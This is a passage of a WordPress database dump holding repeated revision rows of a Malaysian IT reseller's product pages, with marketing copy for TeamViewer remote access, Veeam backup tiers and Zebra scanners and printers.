Reset</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n</div>','TeamViewer','','inherit','closed','closed','','1605-revision-v1','','','2018-12-12 16:55:23','2018-12-12 08:55:23','',1605,'https://bintara.com.my/blog/2018/12/12/1605-revision-v1/',0,'revision','',0),(1964,1,'2018-12-14 10:51:42','2018-12-14 02:51:42','<h3>Veeam</h3>\r\n<h3><span class=\"veeam-text__text-largest\">Expanding leadership inÂ CloudÂ Data Management</span></h3>\r\n<div class=\"section-title-component aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--phone--0 aem-GridColumn--tablet--6 aem-GridColumn--offset--default--0\">\r\n<div class=\"section-title section-title--alignment-left section-title--only-title veeam-component__component-spacing-below--md\">\r\n<div class=\"section-title__title-block\">\r\n<h4 class=\"section-title__title section-title__title--gray\">Hyper-Availability is mission-critical for todayâ€™s business</h4>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"veeam-text base-component parbase aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--tablet--6 aem-GridColumn--offset--phone--0 aem-GridColumn--offset--default--0\">\r\n<div class=\" veeam-component__component-spacing-below--ss\">\r\n<div class=\"veeam-text \">There\'s a new expectation of today\'s data that it moves to a new state of intelligence, able to automatically anticipateÂ needÂ and meet demand, and move securely across multi-cloud infrastructures. Resulting in the insights you need to speed up the pace of innovation and deliver new digital services and experiences.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div class=\"veeam-text base-component parbase aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--tablet--6 aem-GridColumn--offset--phone--0 aem-GridColumn--offset--default--0\">\r\n<div class=\" veeam-component__component-spacing-below--ss\">\r\n<div></div>\r\n</div>\r\n<div>\r\n<h4>Availability solutions that fit your business needs and budget</h4>\r\n<h4><strong>Small Business</strong></h4>\r\n<strong>Veeam Backup Essentials</strong>\r\n<ul>\r\n 	<li>Manage the ever-increasing backup complexity of your small business (250 employees or less)</li>\r\n 	<li>Save up to 60% for the same enterprise-level functionality and scalability</li>\r\n 	<li>Get Hyper-Availability for ALL of your workloads â€” virtual, physical and cloud</li>\r\n</ul>\r\n<h4><strong>Medium Enterprise</strong></h4>\r\n<strong>Veeam Backup &amp; Replication</strong>\r\n<ul>\r\n 	<li>Manage ALL virtual, physical, and cloud-based workloads from a single console</li>\r\n 	<li>Restore entire VMs, individual files and everything in between</li>\r\n 	<li>View and recover application items from backups or replicas without needing to restore the whole a virtual machine</li>\r\n</ul>\r\n<h4><strong>Large Enterprise</strong></h4>\r\n<strong>Veeam Availability Suite</strong>\r\n<ul>\r\n 	<li>Take control of your entire virtual, physical and cloud backup environment</li>\r\n 	<li>Achieve disaster recovery of any IT service and related applications and data within seconds and minutes</li>\r\n 	<li>Respond proactively to potential problems with real-time monitoring, reports and alerts</li>\r\n</ul>\r\n</div>\r\n</div>\r\n[maxbutton id=\"1\" ]','Veeam','','inherit','closed','closed','','1608-autosave-v1','','','2018-12-14 10:51:42','2018-12-14 02:51:42','',1608,'https://bintara.com.my/blog/2018/12/12/1608-autosave-v1/',0,'revision','',0),(1965,1,'2018-12-12 17:06:45','2018-12-12 09:06:45','TeamViewerÂ focuses on cloud-based technologies to enable online remote support and collaboration globally. To thrive now and in the coming years, businesses and individuals need remote desktop support, remote access, and online collaboration to be able to connect worldwide. TeamViewer is at the forefront of that innovation.\r\n\r\n<img class=\"wp-image-1960 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Teamviewer-page.png\" alt=\"\" width=\"509\" height=\"257\" />\r\n<div class=\"wpb_text_column wpb_content_element \">\r\n<div class=\"wpb_wrapper\">\r\n\r\nWeâ€™re serious about security, and we put our customers and their clients first when it comes to protecting them with the latest in technology. Our infrastructure is ISO 27001 certified and completely HIPAA and SOC2 compliant:\r\n<ul>\r\n 	<li>256-bit AES Encryption</li>\r\n 	<li>Two-Factor Authentication</li>\r\n 	<li>SOC2 Certified and Compliant</li>\r\n 	<li>ISO 27001 Certification for Information Security Management</li>\r\n 	<li>HIPAA Compliant</li>\r\n 	<li>Brute Force Protection</li>\r\n 	<li>User &amp; IP Whitelisting</li>\r\n 	<li>Trusted Device Lists</li>\r\n 	<li>Enforced Password Reset</li>\r\n</ul>\r\n<div class=\"vc_row wpb_row vc_row-fluid wd-row wd-row--tertiary\" data-vc-full-width=\"true\" data-vc-full-width-init=\"true\">\r\n<div class=\"wpb_column vc_column_container vc_col-sm-12 vc_col-md-8 vc_col-xs-12\">\r\n<div class=\"vc_column-inner\">\r\n<div class=\"wpb_wrapper\">\r\n<div class=\"wpb_text_column wpb_content_element  wd-margin-bottom-zero\">\r\n<div class=\"wpb_wrapper\">\r\n<h3>Connect to Your Desktop Remotely. Without Slow VPN or Network Security Restrictions Getting in Your Way.</h3>\r\n</div>\r\nSupported by a blazing-fast global network, TeamViewerâ„¢ free remote access softwareÂ tools enable you connect to your work computer, from anywhere, anytime. So you can continue working with desktop applications remotely. And access desktop files, as if you were sitting in front of your workstation. Quickly. Easily. Securely.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div id=\"overview\" class=\"vc_row wpb_row vc_row-fluid wd-row\" data-vc-full-width=\"true\" data-vc-full-width-init=\"true\">\r\n<div id=\"overview\" class=\"wpb_column vc_column_container vc_col-sm-12\">\r\n<div class=\"vc_column-inner\">\r\n<div class=\"wpb_wrapper\">\r\n<div class=\"wpb_text_column wpb_content_element  wd-margin-bottom-zero\">\r\n<div class=\"wpb_wrapper\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','TeamViewer','','inherit','closed','closed','','1605-revision-v1','','','2018-12-12 17:06:45','2018-12-12 09:06:45','',1605,'https://bintara.com.my/blog/2018/12/12/1605-revision-v1/',0,'revision','',0),(1967,1,'2018-12-12 17:09:14','2018-12-12 09:09:14','TeamViewerÂ focuses on cloud-based technologies to enable online remote support and collaboration globally. To thrive now and in the coming years, businesses and individuals need remote desktop support, remote access, and online collaboration to be able to connect worldwide. TeamViewer is at the forefront of that innovation.\r\n\r\n<img class=\"wp-image-1960 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Teamviewer-page.png\" alt=\"\" width=\"509\" height=\"257\" />\r\n<div class=\"wpb_text_column wpb_content_element \">\r\n<div class=\"wpb_wrapper\">\r\n\r\nWeâ€™re serious about security, and we put our customers and their clients first when it comes to protecting them with the latest in technology. Our infrastructure is ISO 27001 certified and completely HIPAA and SOC2 compliant:\r\n<ul>\r\n 	<li>256-bit AES Encryption</li>\r\n 	<li>Two-Factor Authentication</li>\r\n 	<li>SOC2 Certified and Compliant</li>\r\n 	<li>ISO 27001 Certification for Information Security Management</li>\r\n 	<li>HIPAA Compliant</li>\r\n 	<li>Brute Force Protection</li>\r\n 	<li>User &amp; IP Whitelisting</li>\r\n 	<li>Trusted Device Lists</li>\r\n 	<li>Enforced Password Reset</li>\r\n</ul>\r\n<div class=\"vc_row wpb_row vc_row-fluid wd-row wd-row--tertiary\" data-vc-full-width=\"true\" data-vc-full-width-init=\"true\">\r\n<div class=\"wpb_column vc_column_container vc_col-sm-12 vc_col-md-8 vc_col-xs-12\">\r\n<div class=\"vc_column-inner\">\r\n<div class=\"wpb_wrapper\">\r\n<div class=\"wpb_text_column wpb_content_element wd-margin-bottom-zero\">\r\n<div class=\"wpb_wrapper\">\r\n<h3>Connect to Your Desktop Remotely. Without Slow VPN or Network Security Restrictions Getting in Your Way.</h3>\r\n</div>\r\nSupported by a blazing-fast global network, TeamViewerâ„¢ free remote access softwareÂ tools enable you connect to your work computer, from anywhere, anytime. So you can continue working with desktop applications remotely. And access desktop files, as if you were sitting in front of your workstation. Quickly. Easily. Securely.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div id=\"overview\" class=\"vc_row wpb_row vc_row-fluid wd-row\" data-vc-full-width=\"true\" data-vc-full-width-init=\"true\">\r\n<div id=\"overview\" class=\"wpb_column vc_column_container vc_col-sm-12\">\r\n<div class=\"vc_column-inner\">\r\n<div class=\"wpb_wrapper\">\r\n<div class=\"wpb_text_column wpb_content_element wd-margin-bottom-zero\">\r\n<div class=\"wpb_wrapper\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','TeamViewer','','inherit','closed','closed','','1605-revision-v1','','','2018-12-12 17:09:14','2018-12-12 09:09:14','',1605,'https://bintara.com.my/blog/2018/12/12/1605-revision-v1/',0,'revision','',0),(1966,1,'2018-12-12 17:09:01','2018-12-12 09:09:01','<h3>Veeam</h3>\r\n<h3><span class=\"veeam-text__text-largest\">Expanding leadership\r\ninÂ CloudÂ Data Management</span></h3>\r\n<div class=\"section-title-component aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--phone--0 aem-GridColumn--tablet--6 aem-GridColumn--offset--default--0\">\r\n<div class=\"section-title section-title--alignment-left\r\n            section-title--only-title  veeam-component__component-spacing-below--md\">\r\n<div class=\"section-title__title-block\">\r\n<h4 class=\"section-title__title section-title__title--gray\">Hyper-Availability is mission-critical for todayâ€™s business</h4>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"veeam-text base-component parbase aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--tablet--6 aem-GridColumn--offset--phone--0 aem-GridColumn--offset--default--0\">\r\n<div class=\" veeam-component__component-spacing-below--ss\">\r\n<div class=\"veeam-text  \">There\'s a new expectation of today\'s data â€” that it moves to a new state of intelligence, able to automatically anticipateÂ needÂ and meet demand, and move securely across multi-cloud infrastructures. Resulting in the insights you need to speed up the pace of innovation and deliver new digital services and experiences.</div>\r\n<div></div>\r\n</div>\r\n<div>\r\n<h3>Availability solutions that fit your business needs and budget</h3>\r\n<h4><strong>Small Business</strong></h4>\r\n<strong>Veeam Backup Essentials</strong>\r\n<ul>\r\n 	<li>Manage the ever-increasing backup complexity of your small business (250 employees or less)</li>\r\n 	<li>Save up to 60% for the same enterprise-level functionality and scalability</li>\r\n 	<li>Get Hyper-Availability for ALL of your workloads â€” virtual, physical and cloud</li>\r\n</ul>\r\n<h4><strong>Medium Enterprise</strong></h4>\r\n<strong>Veeam Backup &amp; Replication</strong>\r\n<ul>\r\n 	<li>Manage ALL virtual, physical, and cloud-based workloads from a single console</li>\r\n 	<li>Restore entire VMs, individual files and everything in between</li>\r\n 	<li>View and recover application items from backups or replicas without needing to restore the whole a virtual machine</li>\r\n</ul>\r\n<h4><strong>Large Enterprise</strong></h4>\r\n<strong>Veeam Availability Suite</strong>\r\n<ul>\r\n 	<li>Take control of your entire virtual, physical and cloud backup environment</li>\r\n 	<li>Achieve disaster recovery of any IT service and related applications and data within seconds and minutes</li>\r\n 	<li>Respond proactively to potential problems with real-time monitoring, reports and alerts</li>\r\n</ul>\r\n</div>\r\n</div>','Veeam','','inherit','closed','closed','','1608-revision-v1','','','2018-12-12 17:09:01','2018-12-12 09:09:01','',1608,'https://bintara.com.my/blog/2018/12/12/1608-revision-v1/',0,'revision','',0),(1972,1,'2018-12-12 17:11:31','2018-12-12 09:11:31','<h3>Veeam</h3>\r\n<h3><span class=\"veeam-text__text-largest\">Expanding leadership\r\ninÂ CloudÂ Data Management</span></h3>\r\n<div class=\"section-title-component aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--phone--0 aem-GridColumn--tablet--6 aem-GridColumn--offset--default--0\">\r\n<div class=\"section-title section-title--alignment-left section-title--only-title veeam-component__component-spacing-below--md\">\r\n<div class=\"section-title__title-block\">\r\n<h4 class=\"section-title__title section-title__title--gray\">Hyper-Availability is mission-critical for todayâ€™s business</h4>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"veeam-text base-component parbase aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--tablet--6 aem-GridColumn--offset--phone--0 aem-GridColumn--offset--default--0\">\r\n<div class=\" veeam-component__component-spacing-below--ss\">\r\n<div class=\"veeam-text \">There\'s a new expectation of today\'s data â€” that it moves to a new state of intelligence, able to automatically anticipateÂ needÂ and meet demand, and move securely across multi-cloud infrastructures. Resulting in the insights you need to speed up the pace of innovation and deliver new digital services and experiences.</div>\r\n<div></div>\r\n<div></div>\r\n</div>\r\n<div>\r\n<h4>Availability solutions that fit your business needs and budget</h4>\r\n<h4><strong>Small Business</strong></h4>\r\n<strong>Veeam Backup Essentials</strong>\r\n<ul>\r\n 	<li>Manage the ever-increasing backup complexity of your small business (250 employees or less)</li>\r\n 	<li>Save up to 60% for the same enterprise-level functionality and scalability</li>\r\n 	<li>Get Hyper-Availability for ALL of your workloads â€” virtual, physical and cloud</li>\r\n</ul>\r\n<h4><strong>Medium Enterprise</strong></h4>\r\n<strong>Veeam Backup &amp; Replication</strong>\r\n<ul>\r\n 	<li>Manage ALL virtual, physical, and cloud-based workloads from a single console</li>\r\n 	<li>Restore entire VMs, individual files and everything in between</li>\r\n 	<li>View and recover application items from backups or replicas without needing to restore the whole a virtual machine</li>\r\n</ul>\r\n<h4><strong>Large Enterprise</strong></h4>\r\n<strong>Veeam Availability Suite</strong>\r\n<ul>\r\n 	<li>Take control of your entire virtual, physical and cloud backup environment</li>\r\n 	<li>Achieve disaster recovery of any IT service and related applications and data within seconds and minutes</li>\r\n 	<li>Respond proactively to potential problems with real-time monitoring, reports and alerts</li>\r\n</ul>\r\n</div>\r\n</div>','Veeam','','inherit','closed','closed','','1608-revision-v1','','','2018-12-12 17:11:31','2018-12-12 09:11:31','',1608,'https://bintara.com.my/blog/2018/12/12/1608-revision-v1/',0,'revision','',0),(1968,1,'2018-12-12 17:09:38','2018-12-12 09:09:38','<h3>Veeam</h3>\r\n<h3><span class=\"veeam-text__text-largest\">Expanding leadership\r\ninÂ CloudÂ Data Management</span></h3>\r\n&nbsp;\r\n<div class=\"section-title-component aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--phone--0 aem-GridColumn--tablet--6 aem-GridColumn--offset--default--0\">\r\n<div class=\"section-title section-title--alignment-left section-title--only-title veeam-component__component-spacing-below--md\">\r\n<div class=\"section-title__title-block\">\r\n<h4 class=\"section-title__title section-title__title--gray\">Hyper-Availability is mission-critical for todayâ€™s business</h4>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"veeam-text base-component parbase aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--tablet--6 aem-GridColumn--offset--phone--0 aem-GridColumn--offset--default--0\">\r\n<div class=\" veeam-component__component-spacing-below--ss\">\r\n<div class=\"veeam-text \">There\'s a new expectation of today\'s data â€” that it moves to a new state of intelligence, able to automatically anticipateÂ needÂ and meet demand, and move securely across multi-cloud infrastructures. Resulting in the insights you need to speed up the pace of innovation and deliver new digital services and experiences.</div>\r\n<div></div>\r\n<div></div>\r\n</div>\r\n<div>\r\n<h3>Availability solutions that fit your business needs and budget</h3>\r\n&nbsp;\r\n<h4><strong>Small Business</strong></h4>\r\n<strong>Veeam Backup Essentials</strong>\r\n<ul>\r\n 	<li>Manage the ever-increasing backup complexity of your small business (250 employees or less)</li>\r\n 	<li>Save up to 60% for the same enterprise-level functionality and scalability</li>\r\n 	<li>Get Hyper-Availability for ALL of your workloads â€” virtual, physical and cloud</li>\r\n</ul>\r\n<h4><strong>Medium Enterprise</strong></h4>\r\n<strong>Veeam Backup &amp; Replication</strong>\r\n<ul>\r\n 	<li>Manage ALL virtual, physical, and cloud-based workloads from a single console</li>\r\n 	<li>Restore entire VMs, individual files and everything in between</li>\r\n 	<li>View and recover application items from backups or replicas without needing to restore the whole a virtual machine</li>\r\n</ul>\r\n<h4><strong>Large Enterprise</strong></h4>\r\n<strong>Veeam Availability Suite</strong>\r\n<ul>\r\n 	<li>Take control of your entire virtual, physical and cloud backup environment</li>\r\n 	<li>Achieve disaster recovery of any IT service and related applications and data within seconds and minutes</li>\r\n 	<li>Respond proactively to potential problems with real-time monitoring, reports and alerts</li>\r\n</ul>\r\n</div>\r\n</div>','Veeam','','inherit','closed','closed','','1608-revision-v1','','','2018-12-12 17:09:38','2018-12-12 09:09:38','',1608,'https://bintara.com.my/blog/2018/12/12/1608-revision-v1/',0,'revision','',0),(1973,1,'2018-12-12 17:11:53','2018-12-12 09:11:53','<h3>Veeam</h3>\r\n<h3><span class=\"veeam-text__text-largest\">Expanding leadership inÂ CloudÂ Data Management</span></h3>\r\n<div class=\"section-title-component aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--phone--0 aem-GridColumn--tablet--6 aem-GridColumn--offset--default--0\">\r\n<div class=\"section-title section-title--alignment-left section-title--only-title veeam-component__component-spacing-below--md\">\r\n<div class=\"section-title__title-block\">\r\n<h4 class=\"section-title__title section-title__title--gray\">Hyper-Availability is mission-critical for todayâ€™s business</h4>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"veeam-text base-component parbase aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--tablet--6 aem-GridColumn--offset--phone--0 aem-GridColumn--offset--default--0\">\r\n<div class=\" veeam-component__component-spacing-below--ss\">\r\n<div class=\"veeam-text \">There\'s a new expectation of today\'s data â€” that it moves to a new state of intelligence, able to automatically anticipateÂ needÂ and meet demand, and move securely across multi-cloud infrastructures. Resulting in the insights you need to speed up the pace of innovation and deliver new digital services and experiences.</div>\r\n<div></div>\r\n<div></div>\r\n</div>\r\n<div>\r\n<h4>Availability solutions that fit your business needs and budget</h4>\r\n<h4><strong>Small Business</strong></h4>\r\n<strong>Veeam Backup Essentials</strong>\r\n<ul>\r\n 	<li>Manage the ever-increasing backup complexity of your small business (250 employees or less)</li>\r\n 	<li>Save up to 60% for the same enterprise-level functionality and scalability</li>\r\n 	<li>Get Hyper-Availability for ALL of your workloads â€” virtual, physical and cloud</li>\r\n</ul>\r\n<h4><strong>Medium Enterprise</strong></h4>\r\n<strong>Veeam Backup &amp; Replication</strong>\r\n<ul>\r\n 	<li>Manage ALL virtual, physical, and cloud-based workloads from a single console</li>\r\n 	<li>Restore entire VMs, individual files and everything in between</li>\r\n 	<li>View and recover application items from backups or replicas without needing to restore the whole a virtual machine</li>\r\n</ul>\r\n<h4><strong>Large Enterprise</strong></h4>\r\n<strong>Veeam Availability Suite</strong>\r\n<ul>\r\n 	<li>Take control of your entire virtual, physical and cloud backup environment</li>\r\n 	<li>Achieve disaster recovery of any IT service and related applications and data within seconds and minutes</li>\r\n 	<li>Respond proactively to potential problems with real-time monitoring, reports and alerts</li>\r\n</ul>\r\n</div>\r\n</div>','Veeam','','inherit','closed','closed','','1608-revision-v1','','','2018-12-12 17:11:53','2018-12-12 09:11:53','',1608,'https://bintara.com.my/blog/2018/12/12/1608-revision-v1/',0,'revision','',0),(1969,1,'2018-12-12 17:10:00','2018-12-12 09:10:00','<h2>ENHANCE PERFORMANCE WITH ENTERPRISE SCANNERS, MOBILE COMPUTERS, TABLETS AND PRINTERS</h2>\r\nMore is expected of you every day, and as a result, you expect more from your technology -- more efficiency, more accuracy, more durability. That is why Zebra engineers scanners, mobile computers, tablets and printers with one purpose -- to help you perform even better.\r\n<ul>\r\n 	<li><strong>MOBILE COMPUTERS AND TABLETS</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-1801\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/mobile-computer-and-tablet.jpg\" alt=\"\" width=\"346\" height=\"195\" />\r\n\r\nEach mobile computer comes with airtight security, steadfast durability and intelligent voice and data performance. With the Android operating system, youâ€™ll find theyâ€™re just as easy to use as your personal devices. This isn\'t consumer technology retrofit for business. Instead, these mobile computers are designed specifically for your enterprise and environment.\r\n<ul>\r\n 	<li><strong>BARCODE SCANNERS</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-1800\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/barcode-scanner.jpg\" alt=\"\" width=\"333\" height=\"187\" />\r\n\r\nFast. Accurate. Durable. Whether you need to capture data at a point of sale, patientâ€™s bedside, production line or warehouse, we have a scanner made for your environment and application.\r\n<ul>\r\n 	<li><strong>PRINTERS</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-1802\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer.jpg\" alt=\"\" width=\"326\" height=\"183\" />\r\n\r\nNo matter what youâ€™re tracking or tagging, with barcodes or RFID, Zebra has the most advanced solutions. This legacy of innovation continues with best-of-breed desktop, industrial, card and mobile printers. And theyâ€™re embedded with software for remote management, easy integration and peak performance.\r\n\r\n[maxbutton id=\"1\" ]','Zebra','','inherit','closed','closed','','1619-revision-v1','','','2018-12-12 17:10:00','2018-12-12 09:10:00','',1619,'https://bintara.com.my/blog/2018/12/12/1619-revision-v1/',0,'revision','',0),(1970,1,'2018-12-12 17:10:07','2018-12-12 09:10:07','<h3>Veeam</h3>\r\n<h3><span class=\"veeam-text__text-largest\">Expanding leadership\r\ninÂ CloudÂ Data Management</span></h3>\r\n&nbsp;\r\n<div class=\"section-title-component aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--phone--0 aem-GridColumn--tablet--6 aem-GridColumn--offset--default--0\">\r\n<div class=\"section-title section-title--alignment-left section-title--only-title veeam-component__component-spacing-below--md\">\r\n<div class=\"section-title__title-block\">\r\n<h4 class=\"section-title__title section-title__title--gray\">Hyper-Availability is mission-critical for todayâ€™s business</h4>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"veeam-text base-component parbase aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--tablet--6 aem-GridColumn--offset--phone--0 aem-GridColumn--offset--default--0\">\r\n<div class=\" veeam-component__component-spacing-below--ss\">\r\n<div class=\"veeam-text \">There\'s a new expectation of today\'s data â€” that it moves to a new state of intelligence, able to automatically anticipateÂ needÂ and meet demand, and move securely across multi-cloud infrastructures. Resulting in the insights you need to speed up the pace of innovation and deliver new digital services and experiences.</div>\r\n<div></div>\r\n<div></div>\r\n</div>\r\n<div>\r\n<h4>Availability solutions that fit your business needs and budget</h4>\r\n&nbsp;\r\n<h4><strong>Small Business</strong></h4>\r\n<strong>Veeam Backup Essentials</strong>\r\n<ul>\r\n 	<li>Manage the ever-increasing backup complexity of your small business (250 employees or less)</li>\r\n 	<li>Save up to 60% for the same enterprise-level functionality and scalability</li>\r\n 	<li>Get Hyper-Availability for ALL of your workloads â€” virtual, physical and cloud</li>\r\n</ul>\r\n<h4><strong>Medium Enterprise</strong></h4>\r\n<strong>Veeam Backup &amp; Replication</strong>\r\n<ul>\r\n 	<li>Manage ALL virtual, physical, and cloud-based workloads from a single console</li>\r\n 	<li>Restore entire VMs, individual files and everything in between</li>\r\n 	<li>View and recover application items from backups or replicas without needing to restore the whole a virtual machine</li>\r\n</ul>\r\n<h4><strong>Large Enterprise</strong></h4>\r\n<strong>Veeam Availability Suite</strong>\r\n<ul>\r\n 	<li>Take control of your entire virtual, physical and cloud backup environment</li>\r\n 	<li>Achieve disaster recovery of any IT service and related applications and data within seconds and minutes</li>\r\n 	<li>Respond proactively to potential problems with real-time monitoring, reports and alerts</li>\r\n</ul>\r\n</div>\r\n</div>','Veeam','','inherit','closed','closed','','1608-revision-v1','','','2018-12-12 17:10:07','2018-12-12 09:10:07','',1608,'https://bintara.com.my/blog/2018/12/12/1608-revision-v1/',0,'revision','',0),(1971,1,'2018-12-12 17:11:16','2018-12-12 09:11:16','<h3>Veeam</h3>\r\n<h3><span class=\"veeam-text__text-largest\">Expanding leadership\r\ninÂ CloudÂ Data Management</span></h3>\r\n<div class=\"section-title-component aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--phone--0 aem-GridColumn--tablet--6 aem-GridColumn--offset--default--0\">\r\n<div class=\"section-title section-title--alignment-left section-title--only-title veeam-component__component-spacing-below--md\">\r\n<div class=\"section-title__title-block\">\r\n<h4 class=\"section-title__title section-title__title--gray\">Hyper-Availability is mission-critical for todayâ€™s business</h4>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"veeam-text base-component parbase aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--tablet--6 aem-GridColumn--offset--phone--0 aem-GridColumn--offset--default--0\">\r\n<div class=\" veeam-component__component-spacing-below--ss\">\r\n<div class=\"veeam-text \">There\'s a new expectation of today\'s data â€” that it moves to a new state of intelligence, able to automatically anticipateÂ needÂ and meet demand, and move securely across multi-cloud infrastructures. Resulting in the insights you need to speed up the pace of innovation and deliver new digital services and experiences.</div>\r\n<div></div>\r\n<div></div>\r\n</div>\r\n<div>\r\n<h4>Availability solutions that fit your business needs and budget</h4>\r\n&nbsp;\r\n<h4><strong>Small Business</strong></h4>\r\n<strong>Veeam Backup Essentials</strong>\r\n<ul>\r\n 	<li>Manage the ever-increasing backup complexity of your small business (250 employees or less)</li>\r\n 	<li>Save up to 60% for the same enterprise-level functionality and scalability</li>\r\n 	<li>Get Hyper-Availability for ALL of your workloads â€” virtual, physical and cloud</li>\r\n</ul>\r\n<h4><strong>Medium Enterprise</strong></h4>\r\n<strong>Veeam Backup &amp; Replication</strong>\r\n<ul>\r\n 	<li>Manage ALL virtual, physical, and cloud-based workloads from a single console</li>\r\n 	<li>Restore entire VMs, individual files and everything in between</li>\r\n 	<li>View and recover application items from backups or replicas without needing to restore the whole a virtual machine</li>\r\n</ul>\r\n<h4><strong>Large Enterprise</strong></h4>\r\n<strong>Veeam Availability Suite</strong>\r\n<ul>\r\n 	<li>Take control of your entire virtual, physical and cloud backup environment</li>\r\n 	<li>Achieve disaster recovery of any IT service and related applications and data within seconds and minutes</li>\r\n 	<li>Respond proactively to potential problems with real-time monitoring, reports and alerts</li>\r\n</ul>\r\n</div>\r\n</div>','Veeam','','inherit','closed','closed','','1608-revision-v1','','','2018-12-12 17:11:16','2018-12-12 09:11:16','',1608,'https://bintara.com.my/blog/2018/12/12/1608-revision-v1/',0,'revision','',0),(1974,1,'2018-12-12 17:12:49','2018-12-12 09:12:49','<h3>Veeam</h3>\r\n<h3><span class=\"veeam-text__text-largest\">Expanding leadership inÂ CloudÂ Data Management</span></h3>\r\n<div class=\"section-title-component aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--phone--0 aem-GridColumn--tablet--6 aem-GridColumn--offset--default--0\">\r\n<div class=\"section-title section-title--alignment-left section-title--only-title veeam-component__component-spacing-below--md\">\r\n<div class=\"section-title__title-block\">\r\n<h4 class=\"section-title__title section-title__title--gray\">Hyper-Availability is mission-critical for todayâ€™s business</h4>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"veeam-text base-component parbase aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--tablet--6 aem-GridColumn--offset--phone--0 aem-GridColumn--offset--default--0\">\r\n<div class=\" veeam-component__component-spacing-below--ss\">\r\n<div class=\"veeam-text \">There\'s a new expectation of today\'s data â€” that it moves to a new state of intelligence, able to automatically anticipateÂ needÂ and meet demand, and move securely across multi-cloud infrastructures. Resulting in the insights you need to speed up the pace of innovation and deliver new digital services and experiences.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div class=\"veeam-text base-component parbase aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--tablet--6 aem-GridColumn--offset--phone--0 aem-GridColumn--offset--default--0\">\r\n<div class=\" 